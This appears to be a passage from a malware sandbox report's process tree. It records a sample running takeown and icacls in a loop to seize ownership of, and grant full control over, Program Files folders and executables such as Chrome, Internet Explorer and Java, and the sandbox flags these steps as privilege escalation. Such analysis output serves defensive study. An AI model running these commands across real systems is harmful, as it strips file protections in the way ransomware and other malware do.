C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\it-IT" /a2⤵PID:1896
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\it-IT" /grant Administrators:F2⤵PID:2332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\ja-JP" /a2⤵PID:2848
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\ja-JP" /grant Administrators:F2⤵PID:1816
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System" /a2⤵PID:2668
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System" /grant Administrators:F2⤵PID:1424
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado" /a2⤵PID:2016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado" /grant Administrators:F2⤵PID:2036
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\de-DE" /a2⤵PID:2800
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\de-DE" /grant Administrators:F2⤵PID:296
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\en-US" /a2⤵PID:1616
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\en-US" /grant Administrators:F2⤵PID:2160
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\es-ES" /a2⤵
- Modifies file permissions
PID:2868
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\es-ES" /grant Administrators:F2⤵PID:1652
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\fr-FR" /a2⤵PID:1260
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\fr-FR" /grant Administrators:F2⤵PID:2828
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\it-IT" /a2⤵PID:200
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\it-IT" /grant Administrators:F2⤵PID:232
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ado\ja-JP" /a2⤵PID:2064
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ado\ja-JP" /grant Administrators:F2⤵PID:1940
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\de-DE" /a2⤵PID:1396
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\de-DE" /grant Administrators:F2⤵PID:1252
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\en-US" /a2⤵PID:2192
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\en-US" /grant Administrators:F2⤵
- Modifies file permissions
PID:2224
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\es-ES" /a2⤵PID:1520
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\es-ES" /grant Administrators:F2⤵PID:2144
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\fr-FR" /a2⤵PID:1884
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\fr-FR" /grant Administrators:F2⤵PID:900
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\it-IT" /a2⤵PID:2972
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\it-IT" /grant Administrators:F2⤵PID:1632
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\ja-JP" /a2⤵PID:2188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\ja-JP" /grant Administrators:F2⤵PID:356
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc" /a2⤵PID:608
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc" /grant Administrators:F2⤵PID:1360
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\de-DE" /a2⤵PID:2244
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\de-DE" /grant Administrators:F2⤵PID:2496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\en-US" /a2⤵PID:1720
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\en-US" /grant Administrators:F2⤵PID:1460
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\es-ES" /a2⤵PID:1700
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\es-ES" /grant Administrators:F2⤵PID:2464
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\fr-FR" /a2⤵PID:448
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\fr-FR" /grant Administrators:F2⤵PID:2860
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\it-IT" /a2⤵PID:2592
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\it-IT" /grant Administrators:F2⤵PID:1020
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\msadc\ja-JP" /a2⤵PID:2332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\msadc\ja-JP" /grant Administrators:F2⤵PID:1896
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB" /a2⤵PID:1684
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB" /grant Administrators:F2⤵PID:2564
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\de-DE" /a2⤵PID:1400
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\de-DE" /grant Administrators:F2⤵PID:2752
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\en-US" /a2⤵PID:2560
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\en-US" /grant Administrators:F2⤵PID:2184
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\es-ES" /a2⤵PID:1820
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\es-ES" /grant Administrators:F2⤵PID:2544
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\fr-FR" /a2⤵PID:1356
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\fr-FR" /grant Administrators:F2⤵PID:208
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\it-IT" /a2⤵PID:2856
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\it-IT" /grant Administrators:F2⤵PID:1476
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\System\Ole DB\ja-JP" /a2⤵PID:1880
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\System\Ole DB\ja-JP" /grant Administrators:F2⤵PID:2200
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker" /a2⤵PID:232
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker" /grant Administrators:F2⤵PID:2016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\DVDMaker.exe" /a2⤵
- Possible privilege escalation attempt
PID:228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\DVDMaker.exe" /grant Administrators:F2⤵PID:2600
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\de-DE" /a2⤵PID:1676
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\de-DE" /grant Administrators:F2⤵PID:2292
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\en-US" /a2⤵
- Modifies file permissions
PID:3016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\en-US" /grant Administrators:F2⤵PID:2088
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\es-ES" /a2⤵PID:952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\es-ES" /grant Administrators:F2⤵PID:1692
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\fr-FR" /a2⤵PID:1456
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\fr-FR" /grant Administrators:F2⤵PID:1472
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\it-IT" /a2⤵PID:1156
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\it-IT" /grant Administrators:F2⤵PID:2496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\ja-JP" /a2⤵PID:1884
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\ja-JP" /grant Administrators:F2⤵PID:2284
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared" /a2⤵PID:2256
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared" /grant Administrators:F2⤵PID:2968
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles" /a2⤵PID:2156
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles" /grant Administrators:F2⤵PID:2596
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy" /a2⤵PID:316
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy" /grant Administrators:F2⤵PID:1424
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl" /a2⤵
- Possible privilege escalation attempt
PID:760
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl" /grant Administrators:F2⤵PID:2912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage" /a2⤵PID:996
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage" /grant Administrators:F2⤵PID:496
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Full" /a2⤵PID:1624
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Full" /grant Administrators:F2⤵PID:2428
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle" /a2⤵PID:1288
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle" /grant Administrators:F2⤵
- Modifies file permissions
PID:2544
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles" /a2⤵PID:1896
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles" /grant Administrators:F2⤵PID:1420
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Memories" /a2⤵PID:2536
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Memories" /grant Administrators:F2⤵PID:1648
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge" /a2⤵PID:224
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge" /grant Administrators:F2⤵PID:2932
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Performance" /a2⤵
- Possible privilege escalation attempt
PID:484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Performance" /grant Administrators:F2⤵PID:200
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Pets" /a2⤵PID:1968
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Pets" /grant Administrators:F2⤵PID:1912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Push" /a2⤵PID:1348
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Push" /grant Administrators:F2⤵PID:2820
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles" /a2⤵PID:2200
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles" /grant Administrators:F2⤵PID:216
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels" /a2⤵PID:2980
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels" /grant Administrators:F2⤵PID:2376
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter" /a2⤵PID:2824
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter" /grant Administrators:F2⤵PID:2412
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion" /a2⤵PID:804
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion" /grant Administrators:F2⤵PID:1932
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Sports" /a2⤵PID:952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Sports" /grant Administrators:F2⤵PID:876
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking" /a2⤵PID:2120
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking" /grant Administrators:F2⤵PID:1460
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Travel" /a2⤵
- Possible privilege escalation attempt
PID:1520
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Travel" /grant Administrators:F2⤵PID:1076
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall" /a2⤵PID:3032
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall" /grant Administrators:F2⤵PID:2844
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette" /a2⤵PID:2364
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette" /grant Administrators:F2⤵PID:2968
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google" /a2⤵PID:1532
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google" /grant Administrators:F2⤵PID:2484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome" /a2⤵PID:2144
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome" /grant Administrators:F2⤵PID:1424
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application" /a2⤵PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\chrome.exe" /a2⤵PID:2328
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\chrome.exe" /grant Administrators:F2⤵PID:2744
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119" /a2⤵PID:2752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119" /grant Administrators:F2⤵PID:2444
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe" /a2⤵PID:2132
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe" /grant Administrators:F2⤵PID:204
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps" /a2⤵PID:2240
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:1488
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions" /a2⤵PID:200
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions" /grant Administrators:F2⤵PID:2176
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer" /a2⤵PID:1524
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer" /grant Administrators:F2⤵PID:1852
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" /a2⤵PID:2356
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" /grant Administrators:F2⤵PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales" /a2⤵PID:1824
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales" /grant Administrators:F2⤵PID:2736
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload" /a2⤵PID:2956
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload" /grant Administrators:F2⤵PID:2148
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements" /a2⤵PID:804
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements" /grant Administrators:F2⤵PID:2796
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm" /a2⤵
- Possible privilege escalation attempt
PID:2060
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm" /grant Administrators:F2⤵PID:2292
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific" /a2⤵PID:344
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific" /grant Administrators:F2⤵PID:2972
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64" /a2⤵PID:2228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64" /grant Administrators:F2⤵PID:1984
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Google\Chrome\Application\SetupMetrics" /a2⤵PID:1900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Google\Chrome\Application\SetupMetrics" /grant Administrators:F2⤵PID:1588
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer" /a2⤵PID:2576
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer" /grant Administrators:F2⤵PID:2156
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\iediagcmd.exe" /a2⤵
- Possible privilege escalation attempt
PID:1532
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\iediagcmd.exe" /grant Administrators:F2⤵PID:2028
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\de-DE" /a2⤵PID:2096
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\de-DE" /grant Administrators:F2⤵PID:760
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\en-US" /a2⤵PID:1216
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\en-US" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\es-ES" /a2⤵PID:2428
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\es-ES" /grant Administrators:F2⤵PID:2548
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\fr-FR" /a2⤵PID:1704
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\fr-FR" /grant Administrators:F2⤵PID:2468
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\images" /a2⤵PID:2672
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\images" /grant Administrators:F2⤵PID:1896
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\it-IT" /a2⤵PID:212
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\it-IT" /grant Administrators:F2⤵PID:1612
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\ja-JP" /a2⤵PID:296
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\ja-JP" /grant Administrators:F2⤵PID:2360
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Internet Explorer\SIGNUP" /a2⤵PID:1408
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Internet Explorer\SIGNUP" /grant Administrators:F2⤵PID:1260
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java" /a2⤵PID:2480
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java" /grant Administrators:F2⤵PID:2600
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80" /a2⤵PID:2108
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80" /grant Administrators:F2⤵PID:644
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\bin" /a2⤵PID:2356
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\bin" /grant Administrators:F2⤵PID:1636
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe" /a2⤵PID:1540
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe" /grant Administrators:F2⤵PID:1824
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db" /a2⤵PID:2376
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db" /grant Administrators:F2⤵PID:2864
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\db\bin" /a2⤵PID:1692
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\db\bin" /grant Administrators:F2⤵PID:3068
-
-
